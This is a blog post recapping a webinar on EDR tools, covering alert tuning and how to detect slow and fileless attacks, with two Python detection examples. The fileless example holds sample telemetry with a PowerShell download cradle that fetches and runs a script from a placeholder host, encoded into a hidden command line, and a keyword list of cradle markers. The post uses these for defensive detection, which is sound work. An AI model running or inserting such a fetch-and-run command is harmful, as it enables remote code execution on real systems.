Threat Detection

The Top Questions People Are Asking About Their EDR Tools

March 28, 2024
To many, the EDR is a complex illusion. In a recent webinar, Principal Security Engineer Matt Hand broke down the agents and sensors that make up modern EDR tools and what security engineers can learn from their tools.

Endpoint Detection and Response (EDR) platforms provide the foundation for most organizations' cybersecurity infrastructure. Designed to continuously monitor and respond to threats, the best EDR tools help security teams identify, investigate, and mitigate malicious behavior.

As it turns out, EDRs are rarely at their best right out of the box. They require constant tuning. Worse, they remain something of a black box to the teams responsible for managing them and maximizing their potential.

Understanding the sensors, agents, and drivers that make up the modern EDR, and the telemetry they produce, provides valuable insight into tuning and optimizing your defenses. Last month, Principal Security Engineer Matt Hand took viewers under the hood of their EDRs. These are some of the top questions from our viewers; you can access the whole recording here.

What should you consider a good false positive or false negative ratio in your EDR?

As with many questions in security, the answer depends on your organization. There is no one-size-fits-all ratio. A car dealership might have a higher tolerance for false negatives than a defense contractor because the scope of what each protects is incredibly different. Where one protects financing and pricing information, the other protects schematics for missiles.

A team protecting critical infrastructure or valuable IP has a lower tolerance for false negatives, where they miss malicious behavior, and for false positives, where they waste precious time chasing alerts that amount to nothing. Both scenarios push the security team to hyperfocus on every alert, and ultimately drive inefficiency.

The solution, Matt says, is for SOC teams to look beyond the noise and focus on the causes and sources behind it. Are false negatives and positives excessive, and do the data sources generating these inaccuracies offer real value?

It's about identifying ways to enhance the value of these sources and determining what can be sensibly filtered out. Ultimately, the balance of false positives and negatives is a decision each organization must tailor to its specific needs and context.

What are best practices for SOC teams to separate signal from noise? 

If threats are moving at machine speed, you need to be responding at a similar pace. That’s why Matt recommends first targeting the longest investigative chains for tuning and filtering. 

If investigating a particular alert requires a significant workload and a lengthy process on the part of your operations team, that is more time sunk into evaluating false positives or, worse, a missed opportunity to prevent a breach. Investing time in tuning and filtering out inaccuracies in these alerts significantly improves your efficiency and effectiveness while reducing noise.

How can defensive engineers enhance detection queries for slow attacks?

In a perfect world, your EDR could process and flag chains of activity that unfold over long periods, but doing so would require storing and correlating a prohibitively expensive amount of data. Most EDRs therefore impose constraints in the form of time-bound windows: a chain of events must occur within the window to be flagged. Threat actors who space out their activities might not be caught because the EDR sees those behaviors as unrelated.

So, how can defensive engineers respond?

The solution starts with changing how we define malicious activity. Instead of requiring multiple actions to happen in sequence before a detection fires, Matt recommends placing more weight on certain actions taken independently, since one of them may signal the other.

For example, service creation is a powerful tool for attackers. If your detection requires both a service being created and that service starting within a constrained window, you will miss the attacker who waits. Instead, consider weighting each of those actions on its own so that either one can trigger a response.
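To make the difference concrete, here is an added example (not code from the webinar or from Matt Hand) that runs two detection strategies over a handful of constructed service events. The window-based rule only alerts when creation and start fall within ten minutes, so it misses an attacker who creates a service and starts it two hours later; the weighted rule scores each event on its own, so the creation alone is enough to alert, while a routine restart of an existing service stays below the threshold. The event schema, weights, and threshold are all assumptions chosen for illustration, not any vendor's telemetry format.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class Event:
    """One service telemetry record (assumed schema, not a vendor format)."""
    ts: datetime
    host: str
    kind: str   # "service_created" or "service_started"
    name: str


# Constructed sample telemetry, not real EDR output.
BASE = datetime(2024, 3, 1, 9, 0, 0)
EVENTS = [
    # Patient attacker: creates a service, then waits two hours before starting it.
    Event(BASE, "ws01", "service_created", "UpdaterSvc"),
    Event(BASE + timedelta(hours=2), "ws01", "service_started", "UpdaterSvc"),
    # Impatient attacker: creates and starts within a minute.
    Event(BASE + timedelta(minutes=5), "ws02", "service_created", "PrintSpoolerHelper"),
    Event(BASE + timedelta(minutes=6), "ws02", "service_started", "PrintSpoolerHelper"),
    # Benign: an existing service is restarted, no creation event at all.
    Event(BASE + timedelta(minutes=30), "ws03", "service_started", "Spooler"),
]


def windowed_detection(events, window=timedelta(minutes=10)):
    """Sequence rule: alert only if a service starts within `window` of its creation.

    Returns the sorted list of (host, service) keys that fired.
    """
    created = {}
    hits = []
    for e in sorted(events, key=lambda e: e.ts):
        key = (e.host, e.name)
        if e.kind == "service_created":
            created[key] = e.ts
        elif e.kind == "service_started" and key in created:
            if e.ts - created[key] <= window:
                hits.append(key)
    return sorted(hits)


# Assumed weights: creating a new service is rare enough on a workstation to be
# worth an alert by itself; starting a service is routine and only contributes.
WEIGHTS = {"service_created": 0.8, "service_started": 0.3}


def weighted_detection(events, weights=WEIGHTS, threshold=0.7):
    """Independent scoring: each event adds its own weight to the (host, service) score.

    No time constraint is applied, so a high-weight action alerts on its own and
    lower-weight actions can still accumulate. Returns the sorted keys at or above
    `threshold`.
    """
    scores = {}
    for e in events:
        key = (e.host, e.name)
        scores[key] = scores.get(key, 0.0) + weights.get(e.kind, 0.0)
    return sorted(k for k, s in scores.items() if s >= threshold)


if __name__ == "__main__":
    print("windowed:", windowed_detection(EVENTS))
    print("weighted:", weighted_detection(EVENTS))
```

The windowed rule fires only for ws02; the weighted rule fires for both ws01 and ws02 and leaves the benign restart on ws03 alone. In practice the weights would be set from your own baseline of how often each action occurs on the hosts you protect.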

Using EDR telemetry, what approach would you recommend for fileless attack types? 

EDR tools are purpose-built for these scenarios. When there is no particular file to look for, defensive teams can use their EDR to monitor for patterns and anomalies in system or network behavior that suggest malicious activity.

These can be anything from unusual file access to suspicious network connections, unexpected application behavior, and more. By building detections around these behaviors, teams can focus on what the malware does rather than on the presence of a malicious file.
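As an added example of behavior-based detection (not code from the webinar or from Matt Hand), the block below inspects constructed process and network telemetry and never looks at a file on disk. It flags a script host spawned by an Office application, decodes a PowerShell -EncodedCommand argument (base64 of UTF-16LE, which is how PowerShell actually expects it) to look for a download cradle, and notes when a script host makes an outbound connection. The event field names, the process lists, and the marker strings are assumptions for illustration; the sample events and addresses are constructed, not captured.

```python
import base64
import re


def encode_ps(script):
    """Encode a script the way PowerShell expects for -EncodedCommand (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry, not real EDR output. Field names are assumptions,
# not any vendor's schema. Addresses use documentation ranges.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"

PROCESS_EVENTS = [
    {"pid": 4242, "image": "powershell.exe", "parent_image": "winword.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_ps(CRADLE)},
    {"pid": 5150, "image": "powershell.exe", "parent_image": "explorer.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"pid": 6000, "image": "chrome.exe", "parent_image": "explorer.exe",
     "cmdline": "chrome.exe"},
]
NETWORK_EVENTS = [
    {"pid": 4242, "dest": "203.0.113.7:443"},
    {"pid": 6000, "dest": "198.51.100.20:443"},
]

# Assumed lists; extend from your own environment's baseline.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-expression",
                  "iex", "net.webclient", "invoke-webrequest")

# PowerShell accepts any unambiguous prefix of -EncodedCommand; longest first so
# "-enc" is not consumed as "-e".
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect_fileless(process_events, network_events):
    """Return {pid: [reasons]} for processes whose behavior, not file contents, looks malicious."""
    pids_with_net = {n["pid"] for n in network_events}
    findings = {}
    for p in process_events:
        reasons = []
        image = p["image"].lower()
        if image in SCRIPT_HOSTS and p["parent_image"].lower() in OFFICE_APPS:
            reasons.append("office application spawned a script host")
        script = decode_encoded_command(p["cmdline"])
        if script is not None:
            reasons.append("encoded command line")
            if any(marker in script.lower() for marker in CRADLE_MARKERS):
                reasons.append("decoded script contains a download cradle")
        if image in SCRIPT_HOSTS and p["pid"] in pids_with_net:
            reasons.append("script host made an outbound connection")
        if reasons:
            findings[p["pid"]] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in detect_fileless(PROCESS_EVENTS, NETWORK_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

Only pid 4242 is flagged, with all four reasons; the scheduled backup script and the browser produce nothing. None of these checks depends on a hash or a file path, which is the point: the same logic catches the payload whether it lives in a macro, a registry value, or a remote URL.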

Making the most of your EDR

While vital, your EDR is still a piece of software. The teams operating it and tuning it to the unique needs of their organization are responsible for getting the most out of the tool so it can perform at its best.

Understanding the inner workings of the EDR can be a massive boon to a defensive team’s ability to create better detections and maximize their resources. For more insight into how these tools work, check out Matt’s presentation or pick up a copy of his book: Evading EDR: The Definitive Guide to Defeating Endpoint Detection Systems.
